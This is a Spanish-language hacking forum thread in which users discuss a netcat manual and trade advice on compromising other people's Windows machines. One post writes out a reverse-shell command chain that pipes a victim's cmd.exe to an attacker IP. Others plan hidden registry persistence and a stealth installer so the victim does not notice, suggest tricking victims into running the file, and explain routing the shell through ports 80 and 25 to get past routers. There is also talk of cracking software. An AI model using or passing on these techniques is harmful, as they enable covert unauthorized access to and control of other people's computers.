Gwendolen
|
hOLA a TODOS..NO PUEDO EJECUTAR NETCAT EN wINDOWS XP HICE LO SIGUIENTE Y NO FUNCIONO C>/NC -H LA MAQUINA RESPODIO COMANDO NO INTERNO .. QUIERO SABER QUE HACER
|
|
|
|
|
|
|
|
|
SeniorX
Programador Novato
|
Cual es tu host  Bueno y con respecto al otro que dice que no puede ejecutar netcat, solo te voy a decir que estas muuuuuuuuuuuuuuuuuuuy perdido, comienza con las cosas mas basicas mejor.
|
|
|
|
|
|
try { live(); } catch (ShitHappensException ex) { MessageBox.Show(ex.Solution) } Precaución: La programacion puede producir adiccion
|
|
|
|
zhyzura
|
|
|
|
|
|
|
- - -->> Sie urteilen zu uns seiend unterschiedlich <<-- - - unser Durst des Wissens ist unersättlich
|
|
|
SeniorX
Programador Novato
|
Esta imprimiendo perfecto, si quisieras explicar como lo pasaste a doc, con que programa quedaria mas feliz aun pietrogar@gmail.com = msn
|
|
|
|
|
|
try { live(); } catch (ShitHappensException ex) { MessageBox.Show(ex.Solution) } Precaución: La programacion puede producir adiccion
|
|
|
|
zhyzura
|
antes de tenerlo en pdf lo tenia en .doc  aunque tambien hay programas para pasarlo de pdf a .doc pero primero tendrias que crackear el archivo pdf. zaludox
|
|
|
|
|
|
- - -->> Sie urteilen zu uns seiend unterschiedlich <<-- - - unser Durst des Wissens ist unersättlich
|
|
|
SeniorX
Programador Novato
|
jajajajaja ok, si tengo algunos programas para hackear pdf.... pero vienen con limitaciones ya que son la version "demo" pero bueno, cuando tenga tiempo los crackeare, y con respecto a tu manual es EXELENTE, muy claro, hoy me lo leí en el colegio (en clases de religion)
|
|
|
|
|
|
|
|
|
SeniorX
Programador Novato
|
Lo puse en practica en mi laboratorio y todo funciono a la perfeccion, exelente manual, cuando estab todo listo y conectado solo escribir help y aprendi a hacer unas cosas muy entretenidas, hasta a apagarle el computador  .... pero bueno si lo quiero hacer sin que la victima sepa segun yo: 1 Tengo que compilar el nectat a un archivo y compilarlo.... 2 Cuando este conectado le creo una entrada de registro para que quede el nectat abierto ocultamente cada vez que se prenda. Segun yo con esto quedaria listo, pero alguien corrijame si me equivoco. Tengo un programa que crea instaladores, y con este hice uno que instala el nectat y el regedit ocultamente, solo me falta probarlo  bueno, lo probare cuando tenga tiempo porque me voy a fotocopiar una prueba del colegio ajajaja. Desde chile, SeniorX.
|
|
|
|
|
|
|
|
|
fanky10
|
Me puse a usar el netcat y me encanto, lo probe con una red y funco lo de la shell remota todo muy lindo pero el tema es: Modo de uso Pc atacante: nc -vv -l -p 80 nc -vv -l -p 25 (o 443 :p) en dos consolas diferentes
Pc victima nc ip atacante 80 | cmd.exe/command.com (dependiendo del S.O) | nc ip atacante 25 (o 443 :p)
El problema mio no es subir el nc ni el .bat con las lineas de comandos en el (obviamente todo en la misma carpeta ) el tema es ejecutarle remotamente el .bat para q me devuelva la shell si alguien me puede ayudar por favor seria genial!!! manden mailz o posteen!!! Fanky10
|
|
|
|
|
|
|
|
|
|
zhyzura
|
una manera poco usual seria indusir a la victima a ejecutarlo o tambien puedes hacerlo mediante exploits :P
|
|
|
|
|
|
|
|
|
infiltrator
|
hola zhyzura
un excelente manual sobre el Netcat, estuve poniendolo en practica pero tengo un problema. Hice la prueba en mis dos maquinas pero te comento que no me funciona, en la pc victima se ejecuta todo bien pero en la pc que escucha no sale nada despues de ejecutar los comandos adecuados para la escucha se queda ahi sin responder nada y en algunas ocasiones me salio el mensage de que no se puede conectar. ¿que estoy haciendo mal? agradeceria una ayuda. por favor colaborenme, ya busque otros tutoriales en internet y me explican lo mismo que en tu manual pero no puedo dar con la falla.
espero me colaboren bye......
|
|
|
|
|
|
|
|
|
|
amadohc
|
para que se pueda hacer la reverse shell tendria que ser una pc de tu misma red dime zhizura si es cierto??? ???
|
|
|
|
|
|
|
|
|
NewLog
|
No tiene por que ser obligatoriamente de tu red. En el mismo tuto zhyzura lo dice ^^ Es qüestión de irlo leyendo todo y no pasar directamente a los comandos  jajajaja (este tipo de conexion funciona tambien con equipos en los cuales la victima se encuentra dentro de una red). Eso quiere decir que si ella/él nos aclara que que se pueden usar denro de una red, es que lo obvio es usarlo fuera de una red ^^ Namarie
|
|
|
|
« Última modificación: 27 Julio 2005, 12:30 por NewLog »
|
|
|
|
|
|
_R€d_
|
Bien, me he releido todo el manual despues de tiempo; ahora entiendo mejor... Pero en un cyber, no podria hacer eso porque los pcs estan detras de un router...entonce que deberia hacer? utilizar puertos permitidos por el router como el 25 y el 80 para hacer la shell inversa?
Funcionaria asi en una maquina de un router que se conecte a mi ip fuera de esa red???
Saludos. ñ_ñ
|
|
|
|
|
|
|
|
|
|
zhyzura
|
a menos de que el router tenga firewall ocuparias hacer la reverse shell por esos puertos(25 y 80), en caso contrario solo basta con una reverse shell sencilla en cualquier puerto a la ip que quieras.
|
|
|
|
|
|
|
|
|
|
_R€d_
|
a menos de que el router tenga firewall ocuparias hacer la reverse shell por esos puertos(25 y 80), en caso contrario solo basta con una reverse shell sencilla en cualquier puerto a la ip que quieras. Ya zhyzura; creo que el router del cyber no tiene firewall; pero como es reverse shell...osea va a existir una conexión entrante a mi pc...el problema es que mi pc sale a internet a traves de un "modem-router" tambien. Entonces si quiero que se conecte a cualquier otro puerto a mi pc...tendria que abrir en el router de mi pc dicho puerto???
|
|
|
|
|
|
|
|
|
|